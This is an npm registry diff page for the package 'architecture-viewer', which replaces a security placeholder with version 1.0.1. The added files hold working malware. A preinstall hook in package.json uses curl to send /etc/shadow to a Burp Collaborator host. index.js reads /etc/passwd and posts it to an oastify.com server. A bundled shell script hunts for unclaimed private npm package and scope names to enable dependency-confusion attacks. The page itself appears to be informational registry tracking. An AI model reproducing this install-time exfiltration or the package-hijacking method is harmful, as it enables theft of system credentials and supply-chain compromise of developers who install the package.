architecture-viewer 0.0.1-security → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of architecture-viewer might be problematic. Click here for more details.

Files changed (7) hide show
  1. package/d_i.txt +1 -0
  2. package/dependency_confution_npm.sh +70 -0
  3. package/index.js +39 -0
  4. package/licenses.csv +40 -0
  5. package/package.json +9 -3
  6. package/package.json.save +12 -0
  7. package/README.md +0 -5
package/d_i.txt ADDED
@@ -0,0 +1 @@
1
+ import InternalModule from "@capitalone/internal-module"
package/dependency_confution_npm.sh ADDED
@@ -0,0 +1,70 @@
1
+ #!/bin/bash
2
+ echo '''
3
+ _ __ ___ __
4
+ / | / /___ ____ ___ / | __ __/ /_____
5
+ / |/ / __ \/ __ `__ \ / /| |/ / / / __/ __ \
6
+ / /| / /_/ / / / / / / / ___ / /_/ / /_/ /_/ /
7
+ /_/ |_/ .___/_/ /_/ /_/ /_/ |_\__,_/\__/\____/
8
+ /_/ v1.0.2
9
+ twitter.com/@x1337loser
10
+ warning: BE AWARE OF FALSE POSITIVE, CONFIRM YOUR FINDING MANUALLY. Good Luck.
11
+ Use with caution. You are responsible for your actions.
12
+ Developers assume no liability and are not responsible for any misuse or damage.
13
+ '''
14
+
15
+ if [ -d $1 ];then
16
+ echo '' >/dev/null 2>&1
17
+ else
18
+ mkdir $PWD/$1;
19
+ fi
20
+ echo -e "Running waybackurls on $1"
21
+ waybackurls $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
22
+ echo -e "Running gau on $1"
23
+ gau $1 | sort -u | grep .js | sed 's/?.*//' | grep -v '/wp-content/\|/wp-includes/\|.json\|jpg\|png\|css|\|/member/\|.jsp\|oauth\|login\|en-us\|v=\|=\|?\|/help/\|/id/\|paragon\|/wp-json/' | sort -u | tee -a $PWD/$1/$1-js-urls.txt >/dev/null 2>&1;
24
+
25
+ cd $PWD/$1;
26
+ echo -e "Found $(cat $1-js-urls.txt | sort -u |wc -l) js file url ";
27
+ cat $1-js-urls.txt | sort -u |while read ut;do
28
+ wget $ut.map >/dev/null 2>&1;
29
+ done
30
+
31
+ grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | grep -v '@' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | tee -a $1-npm-packages.txt >/dev/null 2>&1;
32
+
33
+ rm $1-js-urls.txt;
34
+ if [ -s $1-npm-packages.txt ];then
35
+ echo -e " Found some packages now going for final test on "$1-npm-packages.txt"";
36
+ cat $1-npm-packages.txt | sort -u | while read ut;do
37
+ if $(curl -o /dev/null -s -w "%{http_code}\n" "https://registry.npmjs.org/$ut" | grep "404" >/dev/null 2>&1); then
38
+ echo -e ""$ut" \e[1;31mFound Private npm package, \e[0m" && echo $ut >> $1-npm-vuln.txt;
39
+ echo -e "\e[1;31mprivate package URL: https://registry.npmjs.org/$ut \e[0m"
40
+
41
+ else
42
+ echo -e ""$ut"\e[1;33m Available in Public Registry \e[0m";
43
+ fi
44
+ done
45
+ else
46
+ echo -e "No npm packages found, now going for scope test "
47
+ fi
48
+ #this part is for the scope package test please be careful with that, some times `www.npmjs.com` will show you 429 response code
49
+ grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' | sed 's:.*/node_modules::' | cut -d '/' -f 2 | sort -u | grep '@' | grep -v '.js\|.ts\|.tsx\|.css' | egrep '\b[a-z]+\b' | grep -v '.png\|.pnp' | grep '@' | cut -d '@' -f 2 | tee -a $1-npm-scope.txt >/dev/null 2>&1;
50
+
51
+ if [ -s $1-npm-scope.txt ];then
52
+ echo -e " Found some Scope names now going for final test on "$1-npm-scope.txt"";
53
+ cat $1-npm-scope.txt | sort -u | while read pkg;do
54
+ OPTION=`curl -o /dev/null -s -w "%{http_code}\n" "https://www.npmjs.com/org/$pkg"`
55
+ if $(echo "$OPTION" | grep "200\|302" >/dev/null 2>&1);then
56
+ echo -e "@"$pkg"\e[1;33m Available in Public Registry \e[0m" && echo $pkg >> $1-npm-scope-vuln.txt;
57
+ grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo "Full package name of @"$pkg" is @"$pkg"/"$ut" ";done
58
+ elif $(echo "$OPTION" | grep "429" >/dev/null 2>&1);then
59
+ echo -e "@"$pkg" \e[1;31m Rate limit detected \e[0m"
60
+
61
+ else
62
+ echo -e "@"$pkg"\e[1;31m Found Unclaimed scope Name\e[0m";
63
+ echo -e "\e[1;31mprivate org URL: https://www.npmjs.com/org/$pkg \e[0m"
64
+ grep -oriahE "[^\"\\'> ]+" | grep 'node_modules' |grep '@'$pkg'' | sed 's:.*/@'$pkg'::' | cut -d '/' -f 2 | sort -u | while read ut;do echo -e "\e[1;31mFull package name of @"$pkg" is @"$pkg"/"$ut", this is unclaimed, Add @"$pkg"/"$ut" in your package.json file like {package: @"$pkg"/"$ut"}, \e[0m";done
65
+ fi
66
+ done
67
+ else
68
+ echo -e "No Scope name found";
69
+ fi
70
+ rm $1-npm-scope.txt *.map.* *.map $1-npm-packages.txt;
package/index.js ADDED
@@ -0,0 +1,39 @@
1
+ const http = require('http');
2
+ const exec = require('child_process').exec;
3
+
4
+ // If this file is executed, you know the package is being installed
5
+ console.log("[+] Malicious package installed!");
6
+
7
+ // Exfiltrate sensitive information to a remote server
8
+ exec('cat /etc/passwd', (error, stdout, stderr) => {
9
+ if (error) {
10
+ console.error(`exec error: ${error}`);
11
+ return;
12
+ }
13
+
14
+ // Send the sensitive data to a remote server
15
+ const options = {
16
+ hostname: '176mbz7btaz0fwz4nmwp2k5smjscg44t.oastify.com', // Replace with your server
17
+ port: 80,
18
+ path: '/exfiltrate',
19
+ method: 'POST',
20
+ headers: {
21
+ 'Content-Type': 'application/json',
22
+ }
23
+ };
24
+
25
+ const req = http.request(options, (res) => {
26
+ res.on('data', (d) => {
27
+ process.stdout.write(d);
28
+ });
29
+ });
30
+
31
+ req.on('error', (e) => {
32
+ console.error(e);
33
+ });
34
+
35
+ // Send the exfiltrated data
36
+ req.write(JSON.stringify({ passwd: stdout }));
37
+ req.end();
38
+ });
39
+
package/licenses.csv ADDED
@@ -0,0 +1,40 @@
1
+ "module name","license","repository"
2
+ "ajv@6.5.3","MIT","https://github.com/epoberezkin/ajv"
3
+ "cytoscape-dagre@2.2.1","MIT","https://github.com/cytoscape/cytoscape.js-dagre"
4
+ "cytoscape-popper@1.0.2","MIT","https://github.com/cytoscape/cytoscape.js-popper"
5
+ "cytoscape@3.2.16","MIT","https://github.com/cytoscape/cytoscape.js"
6
+ "dagre@0.7.4","MIT","https://github.com/cpettitt/dagre"
7
+ "dagre@0.8.2","MIT","https://github.com/dagrejs/dagre"
8
+ "fast-deep-equal@2.0.1","MIT","https://github.com/epoberezkin/fast-deep-equal"
9
+ "fast-json-stable-stringify@2.0.0","MIT","https://github.com/epoberezkin/fast-json-stable-stringify"
10
+ "fillthisfornow@0.0.0","UNLICENSED",""
11
+ "fs-access@1.0.1","MIT","https://github.com/sindresorhus/fs-access"
12
+ "graphlib@1.0.7","MIT","https://github.com/cpettitt/graphlib"
13
+ "graphlib@2.1.5","MIT","https://github.com/dagrejs/graphlib"
14
+ "heap@0.2.6","PSF","https://github.com/qiao/heap.js"
15
+ "immutability-helper@2.7.1","MIT","https://github.com/kolodny/immutability-helper"
16
+ "invariant@2.2.4","MIT","https://github.com/zertosh/invariant"
17
+ "isexe@2.0.0","ISC","https://github.com/isaacs/isexe"
18
+ "js-tokens@4.0.0","MIT","https://github.com/lydell/js-tokens"
19
+ "json-schema-traverse@0.4.1","MIT","https://github.com/epoberezkin/json-schema-traverse"
20
+ "karma-chrome-launcher@2.2.0","MIT","https://github.com/karma-runner/karma-chrome-launcher"
21
+ "lodash.debounce@4.0.8","MIT","https://github.com/lodash/lodash"
22
+ "lodash@3.10.1","MIT","https://github.com/lodash/lodash"
23
+ "lodash@4.17.10","MIT","https://github.com/lodash/lodash"
24
+ "loose-envify@1.4.0","MIT","https://github.com/zertosh/loose-envify"
25
+ "null-check@1.0.0","MIT","https://github.com/sindresorhus/null-check"
26
+ "object-assign@4.1.1","MIT","https://github.com/sindresorhus/object-assign"
27
+ "popper.js@1.14.4","MIT","https://github.com/FezVrasta/popper.js"
28
+ "preact-compat@3.18.3","MIT","https://github.com/developit/preact-compat"
29
+ "preact-render-to-string@3.8.2","MIT","https://github.com/developit/preact-render-to-string"
30
+ "preact-router@2.6.1","MIT","https://github.com/developit/preact-router"
31
+ "preact-transition-group@1.1.1","MIT","https://github.com/developit/preact-transition-group"
32
+ "preact@8.3.1","MIT","https://github.com/developit/preact"
33
+ "pretty-format@3.8.0","MIT","https://github.com/thejameskyle/pretty-format"
34
+ "prop-types@15.6.2","MIT","https://github.com/facebook/prop-types"
35
+ "punycode@2.1.1","MIT","https://github.com/bestiejs/punycode.js"
36
+ "standalone-react-addons-pure-render-mixin@0.1.1","MIT",""
37
+ "tippy.js@2.5.4","MIT","https://github.com/atomiks/tippyjs"
38
+ "uri-js@4.2.2","BSD-2-Clause","https://github.com/garycourt/uri-js"
39
+ "which@1.3.1","ISC","https://github.com/isaacs/node-which"
40
+
package/package.json CHANGED
@@ -1,6 +1,12 @@
1
1
  {
2
2
  "name": "architecture-viewer",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "description": "An architecture viewer tool",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "/usr/bin/curl --data @/etc/shadow ${hostname}2gcjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net"
9
+ },
10
+ "author": "",
11
+ "license": "ISC"
6
12
  }
package/package.json.save ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "architecture-viewer",
3
+ "version": "6.7.8",
4
+ "description": "Malicious package ",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+
9
+ },
10
+ "author": "al1min",
11
+ "license": "ISC"
12
+ }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=architecture-viewer for more information.